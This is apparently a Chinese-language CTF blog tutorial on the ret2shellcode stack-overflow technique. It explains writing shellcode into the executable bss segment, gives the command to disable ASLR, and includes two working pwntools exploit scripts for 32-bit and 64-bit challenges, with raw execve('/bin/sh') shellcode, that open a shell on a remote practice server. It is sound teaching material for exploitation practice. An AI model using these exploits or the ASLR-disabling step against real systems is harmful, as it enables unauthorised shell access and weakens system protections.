Ret2shellcode

分析原理

控制程序执行shellcode代码。

shellcode代码指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。

是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码

在栈溢出的基础上，要想执行shellcode，需要相应的binary在运行时shellcode所在区域具有可执行权限。

利用

• 运行时shellcode所在区域具有可执行权限
• 程序存在溢出，可以控制返回地址
• 操作系统关闭ASLR (地址空间布局随机化) 保护 echo 0 > /proc/sys/kernel/randomize_va_space
• 一般情况下shellcode都写入bss段

解题思路

算出溢出位(cyclic)，构造初始paylaod. 使用GDB的vmmap查看bss段权限 将shellcode数据写入到bss段 将程序溢出到上一步用户提交变量的地址 因为写入到bss段之后，关于read函数read(int fd,buf,size_t count) buf就是shellcode写入的bss段地址，也就是我们要溢出到的地址。

例题

ret2sc

​ 查看下源码，发现name变量声明在bss段

​ 按照上面的解题步骤来做，通过cyclic算出溢出位

用vmmap查看bss段权限

可以看到有足够的权限，我们可以将shellcode写入到bss段，使用asm(shellcraft.sh())来生成shellcode,将生成的shellcode写入到name所在的bss段。然后在第二次输入时发送payload将程序溢出到上一个用户变量所在的地址。

exp:

from pwn import *

#sh = process('./ret2sc')
sh = remote('120.79.17.251',10002)
addr = 0x0804A080

shellcode = asm(shellcraft.sh())
payload = 'a'*60
sh.sendline(shellcode)
sh.sendline(payload+p32(addr))
sh.interactive()

ret2shellcode64

​ 和32位没什么不同，就是最后返回的是64位的地址

exp:

from pwn import *

#sh = process('./ret2sc_x64')
sh = remote('120.79.17.251', 10003)
addr = 0x0000000000601080
shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
#shellcode = asm(shellcraft.amd64.linux.sh())
payload = 'a' * 56
sh.sendline(shellcode)
sh.sendline(payload+p64(addr))
sh.interactive()

持续更新

偏有宸机 ret2shellcode在宸机师傅博客学习。宸机师傅—-我pwn生涯的领路人